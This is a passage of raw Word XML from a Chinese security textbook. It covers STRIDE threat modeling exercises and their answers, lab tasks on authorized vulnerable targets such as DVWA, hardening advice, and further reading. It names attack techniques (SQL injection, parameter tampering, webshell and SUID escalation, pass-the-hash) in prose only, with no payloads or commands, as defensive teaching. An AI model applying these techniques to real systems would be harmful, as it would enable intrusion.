        <w:t xml:space="preserve">：没有分段时，攻击者从第一台失陷主机出发，可以ARP扫描发现全部内网存活主机，Pass-the-Hash攻击同一广播域内的Windows主机，或利用内网服务的信任关系直接SSH/RDP登陆。有分段时，员工网段到服务器网段必须经过防火墙或ACL，攻击者需要额外的权限提升或利用防火墙允许的特定端口才能探测到服务器段的主机；同时，段间流量经过路由或安全设备，可在这些设备上被日志记录和检测（回指第19.1节IDS部署位置的选择），增加了被发现的可能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题3（提取题·STRIDE六类威胁）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">问题：列举STRIDE的六类威胁（中英文），并各举一个在Web应用场景中的实例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从你熟悉的靶机练习（如DVWA/SQLi/XSS/文件上传）中回忆对应的攻击类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2310"/>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="3630"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">威胁类</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">英文</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Web应用实例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">欺骗</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击者通过SQL注入获取管理员密码哈希，破解后冒充管理员登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">篡改</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击者拦截HTTP请求，修改POST参数中的商品价格后再提交</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">否认</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">管理员删除了关键数据库记录，但因日志不完整无法证明是谁执行的删除操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">信息泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">服务器错误页面暴露了数据库版本和内部文件路径（回指第10章的报错注入与信息泄漏）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">拒绝服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">攻击者发送超长HTTP请求头，耗尽Web服务器的内存资源导致服务崩溃</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">权限提升</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elevation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">普通用户通过修改URL中的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user_id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">参数为管理员ID，访问管理员功能（水平越权），或通过文件上传漏洞获取Webshell后利用SUID提权（垂直提权，回指第15章）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题4（迁移任务·对靶机系统做STRIDE）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">任务：选择一台你已搭建的授权靶机（如VulnHub的Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2，或OWASP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Broken Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Applications中的DVWA靶场），绘制该靶机Web应用的上下文级DFD（至少包含“用户浏览器”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“Web应用进程”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“MySQL数据库”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三个元素及它们之间的数据流），然后对每条数据流逐一应用STRIDE，记录分析出的威胁列表，并针对每个威胁给出至少一条具体的防御建议（可以是配置修改、代码修复或安全产品部署）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：可参考本节中Web请求数据流的STRIDE分析示例；不要试图找出“所有威胁”——专注找出3到5个你在第9-11章学过或亲手利用过的漏洞类型对应的威胁即可，把它们写进STRIDE表格。完成后，对照第19.1节的IDS规则和第20.1节的加固检查清单，验证你的防御建议是否与本书的防御框架一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（仅提供分析模板，内容因靶机而异②）：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">上下文级DFD元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：外部实体——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户浏览器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（信任边界外）；进程——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Web应用（Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（信任边界内）；数据存储——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（信任边界内）；数据流1——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户浏览器→Web应用：HTTP请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（跨信任边界）；数据流2——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Web应用→MySQL：SQL查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；数据流3——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MySQL→Web应用：查询结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；数据流4——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Web应用→用户浏览器：HTTP响应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">对数据流1应用STRIDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：S——是否存在弱口令或缺失多因素认证？T——是否使用HTTPS保护请求完整性？I——Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie是否设置Secure/HttpOnly标志？D——Web服务器是否配置了请求速率限制？E——URL参数中是否包含可被操控的用户角色标识？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御措施示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：启用HTTPS（预防T和I）；设置强密码策略和登录失败锁定（预防S）；设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mod_evasive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或Nginx的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">limit_req</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（预防D）；在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">php.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session.cookie_secure=On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session.cookie_httponly=On</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（减少I）；所有授权检查放在服务端逻辑中而非依赖客户端参数（预防E）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与本书防御框架的对齐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：上述措施分别对应第20.1节的最小权限（服务端授权检查）、网络分段（HTTPS视为传输加密的一项基础实践）、补丁管理（保持PHP/Apache版本最新），以及在IDS中编写规则检测异常的URL参数篡改模式（回指第19.1节）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="371"/>
    <w:bookmarkStart w:id="372" w:name="小结-24"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20.2.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节完成了两件核心工作。一是引入STRIDE威胁建模框架，让防御者在系统设计阶段就能以结构化的方式（逐层DFD、逐元素、逐威胁类）识别潜在威胁，实现“防御左移”——在代码编写和部署之前就确定防御重点。二是构建纵深防御的总图（预防→检测→响应），将本书第19章的检测工程与第20章的加固措施统一为一套连贯的防御生命周期。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE的六类威胁——欺骗、篡改、否认、信息泄露、拒绝服务、权限提升——覆盖了对“认证、完整性、非否认性、机密性、可用性、授权”六项安全属性的违背，构成了一张威胁分析的基本检查清单。而纵深防御承认单点防御的脆弱性，主张通过多层异质控制的重叠，在预防失效时仍能以检测和响应控制损失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">两者结合的核心价值在于：STRIDE告诉你从设计之初就该夯实的地基在哪里，纵深防御保证即使某些层被突破，整座建筑不会轰然倒塌。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="372"/>
    <w:bookmarkStart w:id="373" w:name="延伸阅读-11"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20.2.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节推荐以下方法论与标准文档作为深入学习的“白名单”读物：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">800系列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：其中SP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 800-30《Guide for Conducting Risk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Assessments》提供了与STRIDE互补的风险评估方法论；SP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 800-53《Security and Privacy Controls for Information Systems and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Organizations》是安全控制基线的大全，可用于将STRIDE分析结果映射为标准化控制措施；SP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 800-154《Guide to Data-Centric System Threat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Modeling》专门讨论了以数据为中心的威胁建模方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CIS Benchmarks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：由互联网安全中心（Center</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Internet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Security）发布的操作系统、数据库、云平台安全基线清单。STRIDE分析出的威胁可被映射到CIS基准中的具体配置项——例如“篡改”威胁对应CIS中对文件完整性监控的审计规则，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“权限提升”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应CIS中对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置和使用审计的条目。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mitigations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ATT&amp;CK框架中每个攻击技术都附带Mitigation字段，指示企业可以采取哪些缓解措施（如M1038</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Execution Prevention、M1026 Privileged Account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Management等）。将STRIDE析出的威胁映射到ATT&amp;CK技术后，可以直接查阅对应缓解措施进行防御加固，这使得威胁建模的产出能够即时转化为可操作的防御工程决策。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">馆藏《从位到物联》兄弟卷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：其中第28章（防火墙与ACL的规则语义）、第29–31章（IoT安全与OTA安全启动）为STRIDE在网络层与IoT场景下的应用提供了底层机制支撑，建议在分析具体系统的DFD时参考相关章节以确保对信任边界判断的技术基础准确。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1214"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Security Development Lifecycle (SDL) Threat Modeling Tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：微软发布的免费威胁建模工具，内置DFD绘制和基于STRIDE的自动威胁生成功能，适合初学者将方法落地为实际操作。其内置的威胁知识库可作为STRIDE学习的补充材料。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="373"/>
    <w:bookmarkStart w:id="384" w:name="专题iot硬件无线与云安全"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">21 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">专题:IoT/硬件、无线与云安全</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="374" w:name="iot-与硬件安全固件uart-与重放"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
